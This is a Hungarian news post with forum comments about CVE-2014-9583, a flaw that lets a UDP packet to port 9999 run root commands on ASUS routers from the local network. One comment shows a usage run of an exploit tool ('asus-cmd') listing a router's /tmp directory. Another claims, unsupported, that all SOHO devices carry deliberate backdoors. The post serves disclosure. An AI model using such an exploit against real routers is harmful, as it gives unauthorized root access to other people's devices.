ASUS router remote root (helyi hálózat felől) és workaround

Néhány hónappal ezelőtt Joshua Drake (jduck) hibát talált ASUS RT-N66U routerében. Kiderült, hogy egy, az UDP 9999 portra küldött csomag segítségével lehetősége nyílik 237 karakterben tetszőleges kódot futtatni a router-en. A hiba - amely a CVE-2014-9583 hibajegy azonosítót kapta - nem csak ezt, hanem más ASUS router-eket is érint. Érinti például a december 31-én kiadott, legfrissebb firmware-t futtató RT-AC87U típust is.

Az ASUS tud a problémáról, már teszteli a javított firmware-t és azt remélhetőleg heteken belül kiadja. Addig is workaround-olható a probléma.

Hozzászólások

Az exploit szépen működik RT-N18U masinán is:

[2015-01-10 12:00:13] louise@louise-macbook.louise.hu:/Users/louise/Development/security/asus
./asus-cmd "ls /tmp"
[*] sent command: ls /tmp
[!] received 512 bytes from 192.168.253.204:64156
0c 15 0033 54b10640 41:41:41:41:41:41
0007 ls /tmp
[!] received 512 bytes from 192.168.253.254:9999
0c 16 0033 54b10640 ac:22:0b:99:26:e4
01a3 APPS
Beceem_firmware
asus_app
asus_router.conf
asus_router_tag
avahi
dhcp6c
dm2_amule_status
...

LouiSe
http://louise.hu

Ebben az a jó, hogy a sebezhetőséget kihasználva workaroundolható a sebezhetőség. :)

Érdekes dolog az előre tervezett, ám eddig sikeresen titkolt backdoor-t hibának nevezni ;) Főleg hogy, hogy az összes SOHO eszközben van ilyen (vagy ehhez hasonló) backdoor, ami nem véletlenül került oda.

--
zrubi.hu